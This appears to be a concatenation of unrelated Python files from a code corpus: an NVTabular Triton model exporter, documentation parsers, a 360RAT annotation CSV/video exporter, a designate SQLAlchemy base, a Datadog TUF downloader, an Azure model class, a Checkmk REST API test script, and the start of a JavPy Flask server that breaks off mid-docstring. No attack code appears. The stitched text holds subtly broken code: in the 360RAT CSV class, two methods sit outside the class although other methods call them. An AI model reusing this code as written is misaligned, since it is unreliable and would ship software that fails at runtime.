    except Exception as e:
        raise ImportError("Failed to compile model_config.proto - is protobuf installed?") from e
    import nvtabular.inference.triton.model_config_pb2 as model_config
def generate_triton_model(workflow, name, output_path, version=1):
    """Convert an NVTabular *workflow* into a Triton python-backend model directory."""
    version_dir = os.path.join(output_path, str(version))
    # Persist the workflow itself under <output>/<version>/workflow.
    workflow.save(os.path.join(version_dir, "workflow"))
    # Emit the config.pbtxt describing the workflow's inputs and outputs.
    _generate_model_config(workflow, name, output_path)
    # Ship the generic python-backend entry point next to the saved workflow.
    copyfile(
        os.path.join(os.path.dirname(__file__), "model.py"),
        os.path.join(version_dir, "model.py"),
    )
def convert_df_to_triton_input(column_names, batch, input_class=httpclient.InferInput):
    """Build one Triton input object per requested column of *batch*."""
    inputs = []
    for name in column_names:
        col = batch[name]
        infer_input = input_class(name, col.shape, np_to_triton_dtype(col.dtype))
        # Triton reads the raw host-side numpy buffer of the cudf column.
        infer_input.set_data_from_numpy(col.values_host)
        inputs.append(infer_input)
    return inputs
def convert_triton_output_to_df(columns, response):
    """Collect the named outputs of a Triton *response* into a cudf DataFrame."""
    data = {}
    for col in columns:
        data[col] = response.as_numpy(col)
    return cudf.DataFrame(data)
def _generate_model_config(workflow, name, output_path):
    """Given a workflow, generate the Triton ModelConfig proto describing the
    inputs and outputs to that workflow, and write it as config.pbtxt."""
    config = model_config.ModelConfig(name=name, backend="python")

    # One variable-length (dims=[-1]) input per workflow input column.
    for column in workflow.column_group.input_column_names:
        dtype = workflow.input_dtypes[column]
        config.input.append(
            model_config.ModelInput(name=column, data_type=_convert_dtype(dtype), dims=[-1])
        )

    # One output per transformed column produced by the workflow.
    for column, dtype in workflow.output_dtypes.items():
        config.output.append(
            model_config.ModelOutput(name=column, data_type=_convert_dtype(dtype), dims=[-1])
        )

    # Triton expects the config at <output_path>/config.pbtxt.
    with open(os.path.join(output_path, "config.pbtxt"), "w") as o:
        text_format.PrintMessage(config, o)
def _convert_dtype(dtype):
    """Convert a dtype to the appropriate Triton proto type.

    Accepts either a dtype name string or a numpy/cudf dtype object
    (``str(np.dtype("float64")) == "float64"`` normalizes both forms).
    """
    type_map = {
        "float64": model_config.TYPE_FP64,
        "float32": model_config.TYPE_FP32,
        "float16": model_config.TYPE_FP16,
        "int64": model_config.TYPE_INT64,
        "int32": model_config.TYPE_INT32,
        "int16": model_config.TYPE_INT16,
        "int8": model_config.TYPE_INT8,
        "uint64": model_config.TYPE_UINT64,
        "uint32": model_config.TYPE_UINT32,
        "uint16": model_config.TYPE_UINT16,
        "uint8": model_config.TYPE_UINT8,
        "bool": model_config.TYPE_BOOL,
    }
    key = str(dtype)
    if key in type_map:
        return type_map[key]
    if cudf.utils.dtypes.is_string_dtype(dtype):
        return model_config.TYPE_STRING
    # Note: the original message had a stray trailing ')'.
    raise ValueError(f"Can't convert dtype {dtype}")
| StarcoderdataPython |
from .loader import get_loader
from . import text_classification
from . import named_entity_recognition
from . import extractive_qa
from . import summarization
from . import text_pair_classification
from . import hellaswag
from . import aspect_based_sentiment_classification
| StarcoderdataPython |
3364240 | <filename>recodoc2/apps/doc/parser/special_parsers.py
from __future__ import unicode_literals
from docutil.etree_util import HierarchyXPath, SingleXPath
import doc.parser.common_parsers as cp
class HTClientParser(cp.NewDocBookParser):
    """DocBook parser for the HttpClient docs; <pre> blocks are split out of paragraphs."""

    xparagraphs = HierarchyXPath('.', './pre')

    def __init__(self, document_pk):
        super(HTClientParser, self).__init__(document_pk)

    def _process_init_page(self, page, load):
        # Every page is parsed in mixed code/text mode.
        load.mix_mode = True

    def _process_mix_mode_section(self, page, load, section):
        # Only chapter-6 subsections (not the chapter heading itself) are mixed.
        in_chapter_six = section.number.startswith('6')
        is_chapter_heading = section.title.startswith('Chapter')
        return in_chapter_six and not is_chapter_heading
class HibernateParser(cp.NewDocBookParser):
    """Plain DocBook parser for the Hibernate documentation; no special rules."""

    def __init__(self, document_pk):
        super(HibernateParser, self).__init__(document_pk)
class JodaParser(cp.MavenParser):
    """Maven-site parser for Joda-Time; only the 'Upgrade' page is mixed mode."""

    xparagraphs = SingleXPath('.//pre')

    def _process_init_page(self, page, load):
        load.mix_mode = True

    def _process_mix_mode_section(self, page, load, section):
        normalized_title = section.title.strip().lower()
        return normalized_title == 'upgrade'
| StarcoderdataPython |
3263740 | <reponame>mylenefarias/360RAT
from PyQt5 import QtWidgets, QtGui
from Interfaces.save_ok__window import Ui_save
from Service.BlackMask import BlackMask
from Service.GetInputUser import GetInput
from sys import platform
import csv
import os
import sys
import shutil
import cv2
import os.path as osp
class CSV:
    def __init__(self, user):
        """Build the 'saved OK' confirmation window and the name-input dialog."""
        # Rows (dicts) accumulated by create_dictionary() for the CSV export.
        self.list_dictionary = []
        self.user = user
        self.window_save_csv = QtWidgets.QMainWindow()
        if platform == "linux" or platform == "linux2":
            # linux
            self.window_save_csv.setWindowIcon(QtGui.QIcon(os.getcwd() + "/Images/icon.png"))
        elif platform == "win32":
            # Windows...
            self.window_save_csv.setWindowIcon(QtGui.QIcon(os.getcwd() + "\Images\icon.png"))
        self.window_save_csv.setWindowTitle("360Rat")
        self.ui_save = Ui_save()
        self.ui_save.setupUi(self.window_save_csv)
        self.ui_save.pushButton_OK.clicked.connect(self.close_save_csv_window)
        # Dialog asking for the annotator's name; both confirming the dialog and
        # finishing the edit trigger the save.
        self.window_input = GetInput()
        ui_input = self.window_input.get_ui()
        ui_input.button_OK.clicked.connect(self.save)
        ui_input.input.editingFinished.connect(self.save)
        self.fps = 60
        # False: save below cwd/videosAnotated; True: ask for a directory (see save()).
        self.flag_path = False
    def close_save_csv_window(self):
        """Hide the 'saved OK' confirmation window."""
        self.window_save_csv.hide()
    def save_file(self, list_imagens, list_ROI, fps, FOV, dictionary, flag):
        """Store the export inputs, then prompt for the annotator's name.

        The actual export happens in save(), triggered by the input dialog.
        """
        self.list_image_anotation = list_imagens
        self.list_compose_ROI = list_ROI
        self.fps = fps
        self.nfov = FOV
        # Maps ROI label -> drawing color (used in save_imagens_files()).
        self.dict_color = dictionary
        self.window_input.set_text_window("Enter your name:")
        window = self.window_input.get_window()
        # Selects the output-directory mode used later in save().
        self.flag_path = flag
        window.show()
    def save(self):
        """Run the full export: annotated images, video, black masks, and CSV."""
        self.window_input.close_window()
        self.user = self.window_input.get_input_text()
        #self.window_input.clear_input_field()
        self.list_dictionary.clear()
        if self.flag_path == False:
            # Default output below the current working directory.
            path = os.getcwd()
            cwd = osp.join(path, "videosAnotated")
        else:
            # Let the user pick the output directory.
            fname = QtWidgets.QFileDialog.getExistingDirectory()
            cwd = fname
        self.save_imagens_files(cwd)
        self.create_dictionary()
        self.save_dictionary(cwd)
        # Confirm to the user that saving finished.
        self.window_save_csv.show()
    def save_imagens_files(self, cwd):
        """Write annotated frames, black masks, and an mp4 under <cwd>/<user>/<video-name>/.

        Any previous export for the same video is deleted first.
        """
        # tail = name of the source video's folder/file; used as the export dir.
        head, tail = os.path.split(self.list_image_anotation[0].get_path())
        path = osp.join(cwd, self.user)
        if not os.path.exists(path):
            os.makedirs(path)
        # Wipe any previous export for this video.
        path = os.path.join(*[cwd, self.user, tail])
        if os.path.exists(path):
            try:
                shutil.rmtree(path)
            except OSError as e:
                print("Error: %s - %s." % (e.filename, e.strerror))
        if not os.path.exists(path):
            os.makedirs(path)
        # Annotated frames go to .../annotation, masks to .../blackMask.
        path = os.path.join(*[cwd, self.user, tail, "annotation"])
        if not os.path.exists(path):
            os.makedirs(path)
        mask_path = os.path.join(*[cwd, self.user, tail, "blackMask"])
        if not os.path.exists(mask_path):
            os.makedirs(mask_path)
        path_video = os.path.join(*[cwd, self.user, tail, "video.mp4"])
        # Frame size taken from the first image (shape is rows x cols).
        shape = self.list_image_anotation[0].get_image().shape
        width = shape[1]
        height = shape[0]
        fourcc = cv2.VideoWriter_fourcc(*'mp4v')
        out_DBSCAN = cv2.VideoWriter(path_video, fourcc, self.fps, (width,height))
        blackmask = BlackMask()
        for image in self.list_image_anotation:
            img_aux = image.get_image().copy()
            if image.get_list_roi():
                for roi in image.get_list_roi():
                    #draw ROI outline in the label's color
                    self.nfov(img_aux)
                    self.nfov.set_fov(roi.get_fov()[1], roi.get_fov()[0])
                    self.nfov.updateNFOV(roi.get_center_point())
                    self.nfov.draw_NFOV_edges(img_aux, label_color= self.dict_color[roi.get_label()])
            mask_out_path = osp.join(mask_path, '{}.jpg'.format(image.get_id()))
            blackmask.draw_black_mask(mask_out_path, image.get_list_roi(), image.get_list_compose_ROI())
            frame_out_path = osp.join(path, '{}.jpg'.format(image.get_id()))
            #save annotated frame in the annotation directory
            cv2.imwrite(frame_out_path, img_aux)
            out_DBSCAN.write(img_aux)
        out_DBSCAN.release()
def create_dictionary(self):
    """Fill self.list_dictionary with one CSV row (dict) per ROI.

    Row types: 0 = plain per-frame ROI, 1 = composed per-frame ROI,
    2 = tracked ROI spanning a frame range (with *_end fields filled in).

    The three row shapes previously duplicated the same 15-key dict
    literal; they now share the _row helper.
    """
    def _row(roi_type, frame, roi_id, center, fov, label, movement,
             frame_end=0, center_end=(0, 0), fov_end=(0, 0)):
        # One CSV row; the *_end fields are only meaningful for type 2.
        return {
            "Type": roi_type,
            "Frame": frame,
            "Id roi": roi_id,
            "Center_point X": center[0],
            "Center_point Y": center[1],
            "ROI H": fov[0],
            "ROI W": fov[1],
            "Label": label,
            "Movement": movement,
            "Frame_end": frame_end,
            "Center_point_end X": center_end[0],
            "Center_point_end Y": center_end[1],
            "ROI_end H": fov_end[0],
            "ROI_end W": fov_end[1],
            "user": self.user,
        }

    for image in self.list_image_anotation:
        for roi in image.get_list_roi():
            # Plain ROIs have no movement information ("**" placeholder).
            self.list_dictionary.append(_row(
                0, image.get_id(), roi.get_id(), roi.get_center_point(),
                roi.get_fov(), roi.get_label(), "**"))
        for roi in image.get_list_compose_ROI():
            self.list_dictionary.append(_row(
                1, image.get_id(), roi.get_id(), roi.get_center_point(),
                roi.get_fov(), roi.get_label(), roi.get_movement()))
    for roi in self.list_compose_ROI:
        # Tracked ROIs: start values come from *_init, end values from *_end.
        self.list_dictionary.append(_row(
            2, roi.get_frame_init(), roi.get_id(), roi.get_center_point_init(),
            roi.get_fov_init(), roi.get_label(), roi.get_movement(),
            roi.get_frame_end(), roi.get_center_point_end(), roi.get_fov_end()))
def save_dictionary(self, cwd):
    """Write every collected ROI row to
    <cwd>/<user>/<video>/list_of_Roi_<user>_<video>.csv (';'-delimited),
    replacing any previous export.
    """
    _, video_name = os.path.split(self.list_image_anotation[0].get_path())
    csv_path = os.path.join(
        cwd, self.user, video_name, f'list_of_Roi_{self.user}_{video_name}.csv'
    )
    if os.path.exists(csv_path):
        os.remove(csv_path)
    # Column order follows the first row's key order.
    fieldnames = self.list_dictionary[0].keys()
    with open(csv_path, 'w', newline='') as handle:
        writer = csv.DictWriter(handle, fieldnames, delimiter=';')
        writer.writeheader()
        writer.writerows(self.list_dictionary)
| StarcoderdataPython |
1767189 | # Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Author: <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import Column, DateTime
from sqlalchemy.exc import IntegrityError
from sqlalchemy.orm import object_mapper
from sqlalchemy.types import CHAR
from designate.openstack.common import timeutils
from designate import exceptions
class Base(object):
    """Common behaviour shared by all designate SQLAlchemy models.

    Written for Python 2: note ``iteritems`` and the old-style ``next``
    iterator protocol below.
    """
    __abstract__ = True
    __table_initialized__ = False

    def save(self, session):
        """ Save this object """
        session.add(self)

        try:
            session.flush()
        except IntegrityError as e:
            # Each backend words a unique-constraint violation differently
            # (MySQL / SQLite / PostgreSQL); match any of them.
            non_unique_strings = (
                'duplicate entry',
                'not unique',
                'unique constraint failed'
            )

            for non_unique_string in non_unique_strings:
                if non_unique_string in str(e).lower():
                    raise exceptions.Duplicate(str(e))

            # Not a Duplicate error.. Re-raise.
            raise

    def delete(self, session):
        """ Delete this object """
        session.delete(self)
        session.flush()

    def __setitem__(self, key, value):
        # Dict-style attribute assignment: model['key'] = value.
        setattr(self, key, value)

    def __getitem__(self, key):
        # Dict-style attribute access: model['key'].
        return getattr(self, key)

    def __iter__(self):
        # NOTE(review): under Python 2 ``dict(...).keys()`` is a list, so
        # ``extend`` below works; on Python 3 this would raise AttributeError.
        columns = dict(object_mapper(self).columns).keys()
        # NOTE(russellb): Allow models to specify other keys that can be looked
        # up, beyond the actual db columns. An example would be the 'name'
        # property for an Instance.
        if hasattr(self, '_extra_keys'):
            columns.extend(self._extra_keys())
        self._i = iter(columns)
        return self

    def next(self):
        # Python 2 iterator protocol (would be __next__ on Python 3).
        n = self._i.next()
        return n, getattr(self, n)

    def update(self, values):
        """ Make the model object behave like a dict """
        for k, v in values.iteritems():
            setattr(self, k, v)

    def iteritems(self):
        """
        Make the model object behave like a dict.

        Includes attributes from joins.
        """
        local = dict(self)
        joined = dict([(k, v) for k, v in self.__dict__.iteritems()
                       if not k[0] == '_'])
        local.update(joined)
        return local.iteritems()
class SoftDeleteMixin(object):
    """Adds soft-delete columns: rows are flagged as deleted, not removed."""
    # '0' means live; a deleted row stores its own id (dashes stripped) so
    # unique constraints keep working for re-created records.
    deleted = Column(CHAR(32), nullable=False, default="0", server_default="0")
    deleted_at = Column(DateTime, nullable=True, default=None)

    def soft_delete(self, session=None):
        """ Mark this object as deleted. """
        self.deleted = self.id.replace('-', '')
        self.deleted_at = timeutils.utcnow()

        if hasattr(self, 'status'):
            self.status = "DELETED"

        self.save(session=session)
| StarcoderdataPython |
1699866 | # (C) Datadog, Inc. 2019
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
# 1st party.
import argparse
import re
# 3rd party.
from tuf.exceptions import UnknownTargetError
# 2nd party.
# 2nd party.
from .download import REPOSITORY_URL_PREFIX, TUFDownloader
from .exceptions import NonCanonicalVersion, NonDatadogPackage, NoSuchDatadogPackageOrVersion
# Private module functions.
def __is_canonical(version):
    """Return True iff *version* is a canonical PEP 440 version string.

    Pattern taken verbatim from PEP 440, Appendix B:
    https://www.python.org/dev/peps/pep-0440/#appendix-b-parsing-version-strings-with-regular-expressions
    """
    pep440_canonical = re.compile(
        r'^([1-9]\d*!)?(0|[1-9]\d*)(\.(0|[1-9]\d*))*'
        r'((a|b|rc)(0|[1-9]\d*))?(\.post(0|[1-9]\d*))?(\.dev(0|[1-9]\d*))?$'
    )
    return bool(pep440_canonical.match(version))
def __get_wheel_distribution_name(standard_distribution_name):
    """Escape a distribution name for use inside a wheel filename.

    Runs of characters other than word chars and '.' collapse to a single
    '_', per PEP 491 "Escaping and Unicode".

    BUG FIX: the previous version passed ``re.UNICODE`` as the positional
    ``count`` argument of ``re.sub`` (capping it at 32 replacements and
    never setting the flag); it is now passed via ``flags=``.
    """
    # https://www.python.org/dev/peps/pep-0491/#escaping-and-unicode
    return re.sub(r'[^\w\d.]+', '_', standard_distribution_name, flags=re.UNICODE)
# Public module functions.
def download():
    """CLI entry point: download a Datadog check wheel through TUF/in-toto.

    Validates the distribution name (must start with 'datadog-') and the
    optional --version (must be PEP 440 canonical), resolves the wheel's
    path inside the repository and prints the local path of the verified
    download.

    :raises NonDatadogPackage: name does not start with 'datadog-'
    :raises NonCanonicalVersion: --version is not canonical
    :raises NoSuchDatadogPackageOrVersion: target not in the repository
    """
    parser = argparse.ArgumentParser()

    parser.add_argument(
        'standard_distribution_name', type=str, help='Standard distribution name of the desired Datadog check.'
    )

    parser.add_argument(
        '--repository', type=str, default=REPOSITORY_URL_PREFIX, help='The complete URL prefix for the TUF repository.'
    )

    parser.add_argument('--version', type=str, default=None, help='The version number of the desired Datadog check.')

    parser.add_argument(
        '-v', '--verbose', action='count', default=0, help='Show verbose information about TUF and in-toto.'
    )

    args = parser.parse_args()
    repository_url_prefix = args.repository
    standard_distribution_name = args.standard_distribution_name
    version = args.version
    verbose = args.verbose

    if not standard_distribution_name.startswith('datadog-'):
        raise NonDatadogPackage(standard_distribution_name)
    else:
        wheel_distribution_name = __get_wheel_distribution_name(standard_distribution_name)

        tuf_downloader = TUFDownloader(repository_url_prefix=repository_url_prefix, verbose=verbose)

        if not version:
            # No explicit version: ask the repository for the latest one.
            version = tuf_downloader.get_latest_version(standard_distribution_name, wheel_distribution_name)
        else:
            if not __is_canonical(version):
                raise NonCanonicalVersion(version)

        # Wheels live under simple/<name>/<name>-<version>-py2.py3-none-any.whl.
        target_relpath = 'simple/{}/{}-{}-py2.py3-none-any.whl'.format(
            standard_distribution_name, wheel_distribution_name, version
        )

        try:
            target_abspath = tuf_downloader.download(target_relpath)
        except UnknownTargetError:
            raise NoSuchDatadogPackageOrVersion(standard_distribution_name, version)

        print(target_abspath)  # pylint: disable=print-statement
| StarcoderdataPython |
1752092 | <reponame>tzhanl/azure-sdk-for-python
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class APIKeyRequest(Model):
    """An Application Insights component API Key creation request definition.

    :param name: The name of the API Key.
    :type name: str
    :param linked_read_properties: The read access rights of this API Key.
    :type linked_read_properties: list[str]
    :param linked_write_properties: The write access rights of this API Key.
    :type linked_write_properties: list[str]
    """

    # msrest (de)serialization map: Python attribute -> wire key/type.
    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'linked_read_properties': {'key': 'linkedReadProperties', 'type': '[str]'},
        'linked_write_properties': {'key': 'linkedWriteProperties', 'type': '[str]'},
    }

    def __init__(self, *, name: str=None, linked_read_properties=None, linked_write_properties=None, **kwargs) -> None:
        super(APIKeyRequest, self).__init__(**kwargs)
        self.name = name
        self.linked_read_properties = linked_read_properties
        self.linked_write_properties = linked_write_properties
| StarcoderdataPython |
45148 | <reponame>bpoje/checkmk-python-rest-api
#!/bin/python3
from Checkmk import *
import re as re
import time
#Init checkmk rest api
def init_checkmk(site_name, cmk_rest_url, cafile, username, secret_token_filename):
    """Create a Checkmk REST-API client.

    :param site_name: checkmk site name
    :param cmk_rest_url: base URL of the site's REST API
    :param cafile: path to the CA bundle used to verify TLS
    :param username: automation user name
    :param secret_token_filename: file whose first line is the secret token
    :return: configured Checkmk client
    """
    # Read the secret token from disk; use a context manager so the file
    # handle is closed (the previous version leaked it).
    with open(secret_token_filename, 'r') as token_file:
        secret_token = token_file.readline().strip('\n')
    bearer_auth = [username, secret_token]
    return Checkmk(cmk_rest_url, cafile, bearer_auth, site_name)
def test_get_host(cmk):
    """Fetch a single host by id and print it together with its etag."""
    bar = '----------------------'
    print(f'{bar}\n get host:\n{bar}')
    host_id = 'my-test'
    found = cmk.host_get(host_id, effective_attributes=True, display_req=False, display_res=False)
    if found != None:  # noqa: E711 -- keep the original comparison semantics
        etag = found[1]
        found[0].output()
        print(f'etag: {etag}')
    else:
        print(f'No host {host_id} found!\n')
def test_get_all_hosts(cmk):
    """List every host known to checkmk and print each one.

    The previous version also compiled an unused upper-case regex plus a
    set of commented-out filtering experiments; the dead code has been
    removed.
    """
    bar = '----------------------'
    print(f'{bar}\n get all host:\n{bar}')
    hosts = cmk.host_get_all(display_req=False, display_res=False)
    if hosts != None:  # noqa: E711 -- keep the original comparison semantics
        print(f'Number of hosts: {len(hosts)}\n')
        for host in hosts:
            host.output(1)
def test_create_host(cmk):
    """Define a Host object with a static IP and create it via the REST API."""
    bar = '----------------------'
    print(f'{bar}\n define a host:\n{bar}')
    new_host = Host(id='my-test', title='my-test', folder='/linux', ipaddress='10.15.146.250')
    new_host.output(1)
    print(f'{bar}\n create host:\n{bar}')
    create_result = cmk.create_host(new_host, send=True, display_req=False, display_res=False)
    # Both branches print the result; only the final verdict differs.
    create_result.output(show_header=True)
    print('fail' if type(create_result.create_return) is Create_fail else 'ok')
def test_activate_changes(cmk, apply_foreign_changes):
    """Activate pending configuration changes (optionally foreign ones too)."""
    bar = '----------------------'
    print(f'{bar}\n activate changes:\n{bar}')
    change_result = cmk.activate_changes(force_foreign_changes=apply_foreign_changes, send=True, display_req=False, display_res=False)
    change_result.output(show_header=False)
    print('fail' if type(change_result.changes_return) is Changes_fail else 'ok')
def test_discover_services(cmk):
    """Run service discovery on the test host (mode 'fix_all')."""
    bar = '----------------------'
    print(f'{bar}\n discover services:\n{bar}')
    target = Host(id='my-test', folder='/linux')
    # mode is one of: 'new', 'remove', 'fix_all', 'refresh', 'only_host_labels'
    discover_result = cmk.discover_services(target, mode='fix_all', send=True, display_req=True, display_res=True)
    discover_result.output(show_header=True)
    print('fail' if type(discover_result.discover_return) is Discover_fail else 'ok')
def test_delete_host(cmk):
    """Delete the test host."""
    target = Host(id='my-test', folder='/linux')
    bar = '----------------------'
    print(f'{bar}\n delete host:\n{bar}')
    delete_result = cmk.delete_host(target, send=True, display_req=False, display_res=False)
    delete_result.output(show_header=False)
    print('fail' if type(delete_result.delete_return) is Delete_fail else 'ok')
def test_get_all_folders(cmk):
    """Recursively list all folders (with hosts) starting from the root '~'."""
    bar = '----------------------'
    print(f'{bar}\n get all folders:\n{bar}')
    folders_result = cmk.get_all_folders('~', recursive=True, show_hosts=True, send=True, display_req=False, display_res=False)
    folders_result.output(show_header=True)
    print('fail' if type(folders_result.get_all_folders_return) is GetAllFolders_fail else 'ok')
def test_get_hosts_in_folder(cmk):
    """Print every host that lives in the root folder ('~')."""
    bar = '----------------------'
    print(f'{bar}\n get hosts in folder:\n{bar}')
    folder = '~'
    print(f'folder: {folder}')
    hosts = cmk.show_all_hosts(folder, send=True, display_req=False, display_res=False)
    if hosts != None:  # noqa: E711 -- keep the original comparison semantics
        for host in hosts:
            host.output(1)
def test_remove_host_tag(cmk):
    """Remove the 'tag_pumpa' tag group from the test host."""
    bar = '----------------------'
    print(f'{bar}\n remove host tag:\n{bar}')
    target = Host(id='my-test', folder='/linux')
    tag_group = 'tag_pumpa'
    update_result = cmk.remove_host_tag(target, tag_group, send=True, display_req=False, display_res=False)
    update_result.output(show_header=True)
    print('fail' if type(update_result.update_return) is Update_fail else 'ok')
def test_update_host_tag(cmk):
    """Set tag group 'tag_pumpa' to 'bs4040' on the test host."""
    bar = '----------------------'
    print(f'{bar}\n update host tag:\n{bar}')
    target = Host(id='my-test', folder='/linux')
    tag_group = 'tag_pumpa'
    tag_group_value = 'bs4040'
    update_result = cmk.update_host_tag(target, tag_group, tag_group_value, send=True, display_req=False, display_res=False)
    update_result.output(show_header=True)
    print('fail' if type(update_result.update_return) is Update_fail else 'ok')
# Remove the static ipaddress attribute (checkmk falls back to resolving
# the IP from the hostname).
def test_remove_host_ipaddress(cmk):
    """Drop the explicit ipaddress from the test host."""
    bar = '----------------------'
    print(f'{bar}\n remove host ipaddress:\n{bar}')
    target = Host(id='my-test', folder='/linux')
    update_result = cmk.remove_host_ipaddress(target, send=True, display_req=False, display_res=False)
    update_result.output(show_header=True)
    print('fail' if type(update_result.update_return) is Update_fail else 'ok')
def test_update_host_ipaddress(cmk):
    """Set a new static ipaddress on the test host."""
    bar = '----------------------'
    print(f'{bar}\n update host ipaddress:\n{bar}')
    target = Host(id='my-test', folder='/linux')
    new_ip = '192.168.1.14'
    update_result = cmk.update_host_ipaddress(target, new_ip, send=True, display_req=False, display_res=False)
    update_result.output(show_header=True)
    print('fail' if type(update_result.update_return) is Update_fail else 'ok')
#Update host with custom request body
def test_update_with_body(cmk):
    """Update a host by sending a hand-built JSON request body.

    Demonstrates the three body shapes the REST API accepts:
    update_attributes (merge), remove_attributes (unset) and
    attributes (replace everything).
    """
    print('----------------------')
    print(' update with manual request body:')
    print('----------------------')
    #Which host to modify?
    update_host = Host(id='my-test',folder='/linux')
    #New values
    new_ip = '192.168.1.123'
    tag_group = 'tag_pumpa'
    tag_group_value = 'bs0050'
    #----------------------------------------------
    #Example 1:
    # Change checkmk host parameter (don't change other parameters):
    # {"update_attributes": {"tag_pumpa": "bs0050"}}
    # NOTE(review): 'js' is presumably the json alias pulled in by
    # 'from Checkmk import *' -- confirm in the Checkmk module.
    data={}
    data['update_attributes'] = {}
    data['update_attributes'][tag_group] = tag_group_value
    data = js.dumps(data)
    #----------------------------------------------
    #Example 2:
    # Remove checkmk parameter (don't change other parameters):
    # {"remove_attributes": ["tag_pumpa_type"]}
    #data={}
    #data['remove_attributes'] = [ tag_group, ]
    #data = js.dumps(data)
    #----------------------------------------------
    #Example 3:
    # Change all checkmk host parameters
    # (any parameters not defined in body will be cleared)
    # {"attributes": {"ipaddress": "192.168.1.123"}}
    #data={}
    #data['attributes'] = {}
    #data['attributes']['ipaddress'] = new_ip
    #data = js.dumps(data)
    #----------------------------------------------
    # The REST API requires the current etag for optimistic locking.
    #Find etag
    etag=cmk.get_etag(update_host)
    print(f'etag: {etag}')
    print(f'data: {data}')
    #Execute update
    update_result = cmk.update_host(update_host,data,etag,send=True,display_req=False,display_res=False)
    if (type(update_result.update_return) == Update_fail):
        update_result.output(show_header=True)
        print('fail')
    else:
        update_result.output(show_header=True)
        print('ok')
# Test
# --- connection settings -------------------------------------------------
site_name = 'nadzor'
cmk_rest_url = 'https://checkmk.example.com/site1/check_mk/api/1.0'
cafile = 'config/corp_ca.pem'
username = 'automation'
# The secret token lives outside the repository tree, one file per site.
secret_token_filename = f'../config/secret/secret-{site_name}.token'

#Init checkmk rest api
cmk = init_checkmk(site_name, cmk_rest_url, cafile, username, secret_token_filename)

#Example:
#Delete, create "my-test" host in CheckMK, set its tag and activate changes
test_get_host(cmk)
test_delete_host(cmk)
test_activate_changes(cmk,apply_foreign_changes=True)
#test_get_host(cmk)
#test_get_all_hosts(cmk)
test_create_host(cmk)
test_activate_changes(cmk,apply_foreign_changes=True)
test_discover_services(cmk)
#test_delete_host(cmk)
#test_activate_changes(cmk,apply_foreign_changes=True)
#test_get_all_folders(cmk)
#test_get_hosts_in_folder(cmk)

#Changed ip and added tag in examples below:
test_get_host(cmk)
test_update_host_tag(cmk)
test_get_host(cmk)
test_remove_host_ipaddress(cmk)
test_get_host(cmk)
test_update_host_ipaddress(cmk)
test_get_host(cmk)
test_remove_host_tag(cmk)
test_get_host(cmk)
#test_update_with_body(cmk)
test_get_host(cmk)

#Sleep to give server some time to process changes
time.sleep(1)
test_activate_changes(cmk,apply_foreign_changes=True)
#Note: GUI can show pending changes for a while, but should eventually disappear.
#To see changes in web GUI you need to refresh the page.
1618000 | from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class UserRole(models.Model):
    """Lookup table of user roles (one unique name per role)."""
    role = models.CharField(max_length=100, unique=True)
    # desc_chs = models.CharField(max_length=250)

    def __unicode__(self):
        # Python-2 Django string representation (shown in the admin).
        return self.role
class Profile(models.Model):
    """Extended per-user profile linked 1:1 to the auth User."""
    user = models.OneToOneField(User, related_name='myprofile')
    fullname = models.CharField(max_length=100, null=True, blank=True)
    company = models.CharField(max_length=150, null=True, blank=True)
    description = models.TextField(default=" ", null=True, blank=True)
    logo = models.ImageField(upload_to='profile_images', blank=True)
    role = models.ForeignKey(UserRole)
    # address = models.CharField(max_length=150)

    def __unicode__(self):
        # BUG FIX: __unicode__ must return text; the previous version
        # returned the related User instance, which raises TypeError when
        # Django coerces the model to a string.
        return self.user.username
| StarcoderdataPython |
3353524 | from __future__ import absolute_import, print_function, unicode_literals
from flask import (
Flask,
make_response,
jsonify,
request,
render_template,
send_from_directory,
abort,
redirect,
)
from flask_cors import CORS
from JavPy.functions import Functions
import json
import os
from JavPy.utils.requester import spawn
import JavPy.utils.config as config
import JavPy.utils.buggyauth as auth
from copy import deepcopy
base_path = "/".join(os.path.abspath(__file__).replace("\\", "/").split("/")[:-3])
web_dist_path = base_path + "/app/web/dist"
app = Flask(__name__, template_folder=web_dist_path)
CORS(app, resources=r"/*")
@app.before_first_request
def before_first_request():
    # Flask requires a callable here; no warm-up work is needed (yet).
    pass
@app.before_request
def before_request():
    # Authentication gate: every endpoint except the login route itself
    # must carry a valid auth cookie (see buggyauth.check_request).
    if request.full_path == "/auth_by_password?":
        return
    if not auth.check_request(request):
        abort(400)
@app.route("/auth_by_password", methods=["POST"])
def auth_by_password():
    """Check the submitted password; on success return a session cookie."""
    params = json.loads(request.data.decode("utf-8"))
    print(params)
    if not auth.check_password(params["password"]):
        return make_response("auth failed"), 400
    return auth.generate_cookie(request)
@app.route("/get_config", methods=["POST"])
def get_config():
    """Return the current configuration as JSON with the password redacted."""
    redacted = {key: value for key, value in config.Config.config.items()
                if key != "password"}
    return json.dumps(redacted)
@app.route("/update_config", methods=["POST"])
def update_config():
    """Persist new auth settings and hot-reload the config/auth modules."""
    data = json.loads(request.data.decode("utf-8"))
    # An empty password field means "keep the current password".
    if data["password"]:
        config.Config.set_config("password", data["password"])
    config.Config.set_config("ip-blacklist", data["ipBlacklist"])
    config.Config.set_config("ip-whitelist", data["ipWhitelist"])
    config.Config.save_config()
    # importlib.reload on Python 3; fall back to the builtin reload on
    # legacy interpreters.
    try:
        import importlib
        _reload = importlib.reload
    except (ImportError, AttributeError):
        _reload = reload
    # Re-import so the freshly saved settings take effect immediately.
    _reload(config)
    _reload(auth)
    return ""
@app.route("/")
def index():
    # Serve the single-page app entry point.
    return render_template("index.html")
@app.route("/<path:path>")
def send_static(path):
    """Serve a static asset from the web dist folder; unknown paths fall
